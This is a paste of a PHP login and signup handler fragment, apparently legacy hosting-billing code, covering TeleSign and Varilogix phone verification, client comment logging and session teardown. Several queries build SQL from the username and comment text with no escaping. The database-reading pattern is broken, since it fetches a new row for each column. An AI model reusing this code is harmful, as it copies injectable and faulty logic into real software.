- $ucomment = "MMV Call Info-Reference ID: {$callinfo['refid']} Error Message: {$callinfo['err']}";
- if (trim($callinfo[refid]) != "") {
- $callinfo[1] = "0";
- $activatenow = "3";
- $account_hold = "1";
- } else {
- if ($ts_default == "3") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else {
- if ($_SESSION['voiced'] == "1") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else if ($telesignactive == "1") {
- $SQL = "SELECT status,config1,config2,config3,config4,config5,config6,config7,config8,config10,config9,module_id FROM `module_types` WHERE name = 'telesign'";
- $query = mysql_query1($SQL);
- $ts_type = mysql_fetch_row($query) [11];
- $ts_where = mysql_fetch_row($query) [10];
- $ts_useid = mysql_fetch_row($query) [9];
- $ts_default = mysql_fetch_row($query) [8];
- $ts_redial = mysql_fetch_row($query) [7];
- $ts_delay = mysql_fetch_row($query) [6];
- $ts_authid = mysql_fetch_row($query) [5];
- $ts_custid = mysql_fetch_row($query) [4];
- $ts_pass = mysql_fetch_row($query) [3];
- $ts_user = mysql_fetch_row($query) [2];
- $ts_url = mysql_fetch_row($query) [1];
- $ts_status = mysql_fetch_row($query) [0];
- $flaggedtext = "";
- $ts_status = 1;
- if ($ts_status == 1 && $_SESSION['voiced'] != "1") {
- include (WORKDIR . "/includes/telesign/pvfunctions.php");
- $uri = $ts_url;
- $iduri = $ts_idurl;
- $custID = $ts_custid;
- $authID = $ts_authid;
- $randCode = rand(10000, 99999);
- $redialCount = $ts_redial;
- $countryCode = $countrycode;
- $phoneNum = $phone;
- if ($_POST['delay'] < $ts_delay || 5 < $_POST['delay'] || !is_numeric($_POST['delay'])) {
- $delayTime = $ts_delay;
- } else {
- $delayTime = $_POST['delay'];
- }
- $extContent = "";
- $extType = "";
- $ts_randCode = $randCode;
- if ($ts_useid == "1") {
- $badtype = false;
- $callinfo = array();
- $ret = requestID($uri, $custID, $authID, $countryCode, $phoneNum);
- $xml_parser = xml_parser_create();
- xml_set_element_handler($xml_parser, "startElement", "endElement");
- xml_set_character_data_handler($xml_parser, "characterData");
- xml_parse($xml_parser, $ret);
- xml_parser_free($xml_parser);
- $ucomment = "TS ID Info-Type: {$callinfo['6']} City: {$callinfo['10']} State: {$callinfo['8']} Zip: {$callinfo['9']} Country: {$callinfo['7']} Reference ID: {$callinfo['3']} Error Code: {$callinfo['4']} Error Message: {$callinfo['5']}";
- if (!strstr($ts_where, $callinfo[11]) && trim($ts_where) != "" && $ts_where != NULL) {
- $badtype = "1";
- }
- }
- $callinfo = "";
- $callinfo = array();
- $ret = requestCALL($uri, $custID, $authID, $countryCode, $phoneNum, $randCode, $delayTime, $redialCount, $extContent, $extType);
- $xml_parser2 = xml_parser_create();
- xml_set_element_handler($xml_parser2, "startElement", "endElement");
- xml_set_character_data_handler($xml_parser2, "characterData");
- xml_parse($xml_parser2, $ret);
- xml_parser_free($xml_parser2);
- $ucomment2 = "TS Call Info-Reference ID: {$callinfo['0']} Error Code: {$callinfo['1']} Error Message: {$callinfo['2']}";
- if ($callinfo[1] == "0" || $ts_useid == "1" && $badtype == "1") {
- $activatenow = "3";
- $account_hold = "1";
- } else {
- if ($ts_default == "3") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else {
- if ($_SESSION['voiced'] == "1") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else if ($vlactive == "1") {
- $SQL = "SELECT status,config1,config2,config3,config4,config5,config6,config7,config8,config10,config9,module_id FROM `module_types` WHERE name = 'varilogix'";
- $query = mysql_query1($SQL);
- $ts_type = mysql_fetch_row($query) [11];
- $ts_where = mysql_fetch_row($query) [10];
- $ts_useid = mysql_fetch_row($query) [9];
- $ts_default = mysql_fetch_row($query) [8];
- $ts_redial = mysql_fetch_row($query) [7];
- $ts_productinfo = mysql_fetch_row($query) [6];
- $ts_apiuser = mysql_fetch_row($query) [5];
- $ts_profileid = mysql_fetch_row($query) [4];
- $ts_pass = mysql_fetch_row($query) [3];
- $ts_user = mysql_fetch_row($query) [2];
- $ts_url = mysql_fetch_row($query) [1];
- $VLresult = mysql_fetch_row($query) [0];
- if ($ts_status == 1 && $_SESSION['voiced'] != "1") {
- $query = "SELECT fname,lname,email FROM users WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $email = mysql_fetch_row(@$result) [2];
- $lname = mysql_fetch_row(@$result) [1];
- $fname = mysql_fetch_row(@$result) [0];
- $randCode = rand(1000, 9999);
- $ts_randCode = $randCode;
- require (WORKDIR . "/includes/varilogix/Request.php");
- require (WORKDIR . "/includes/varilogix/Call.php");
- require (WORKDIR . "/includes/varilogix/Call/Result.php");
- $call = new Varilogix_Call("drams-2b8baf", $ts_user, md5($ts_pass), intval($ts_profileid));
- $call->setProductInfo($ts_productinfo, "0.00");
- $call->setPin($randCode);
- $call->setCustomerInfo($fname . " " . $lname, $email, $phone, strtoupper($country));
- $result = $call->call();
- $status = $result;
- $callid = $call->getCode();
- $statusmsg = $call->getMessage();
- $flaggedtext = "";
- $ucomment2 = "Varilogix Call Info-Reference ID: {$callid} Status: {$status} Status Message: {$statusmsg}";
- if ($status == "1000" || $status == "calling") {
- $callinfo[1] = "0";
- $activatenow = "3";
- $account_hold = "1";
- } else {
- if ($ts_default == "3") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else if ($_SESSION['voiced'] == "1") {
- $cErrorMsg = BADLOGIN2;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- }
- }
- if (($ts_status == 1 || $VLresult == "1") && $_SESSION['voiced'] != "1") {
- $userid = sqlsingle("SELECT * FROM users WHERE username='" . $newuid . "'", "id");
- $date = strtotime("now");
- if ($uvcomment != "") {
- $query = "INSERT INTO client_comments (adminid,userid,comment,date) VALUES ('Signup','{$userid}','{$uvcomment}','{$date}')";
- $result = mysql_query1($query);
- }
- if ($ucomment != "") {
- $query = "INSERT INTO client_comments (adminid,userid,comment,date) VALUES ('Signup','{$userid}','{$ucomment}','{$date}')";
- $result = mysql_query1($query);
- }
- if ($ucomment2 != "") {
- $query = "INSERT INTO client_comments (adminid,userid,comment,date) VALUES ('Signup','{$userid}','{$ucomment2}','{$date}')";
- $result = mysql_query1($query);
- }
- }
- include (WORKDIR . "/pnewacctwelcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN2;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- } else if ($numrows != 0 && $password1 != $fetch_em['password']) {
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN3;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- } else {
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- }
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $LoggedIn = 0;
- }
- }
- include (WORKDIR . "/includes/gparser.php");
- $template->set_var("cErrorMsg", $cErrorMsg);
- $template->set_var("rtype", $rtype);
- $template->set_var("id", $id);
- $template->set_var("lastlogin", $lastlogin);
- $template->set_var("lastip", $lastip);
- $template->set_var("post_string", $post_string);
- $template->set_var("subaction", $subaction);
- $template->set_var("nameemail", $nameemail);
- $template->set_var("namebundle", $namebundle);
- $template->set_var("cTld", $cTld);
- $template->set_var("cSld", $cSld);
- $template->set_var("usecookies", $usecookies);
- $template->set_var("excessive_login", $excessive_login);
- if ($LoggedIn == "1") {
- if ($_GET[id] && (0 < $adminflag || $adminflag == "-1") && $subaction == "adhd") {
- ob_start();
- header("Location: {$securebase}/admin/helpdesk.php?subaction=adhd&id=" . $_GET[id]);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- } else if ($excessive_login != "") {
- print $template->parse("aLogIn2.php");
- } else if ($_GET[pda] || $_SESSION[pda] == "1") {
- $_SESSION[pda] = "1";
- print $template->parse("aLogInpda.php");
- } else {
- print $template->parse("aLogIn.php");
- }
- @ob_end_flush();
- @ob_end_clean();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
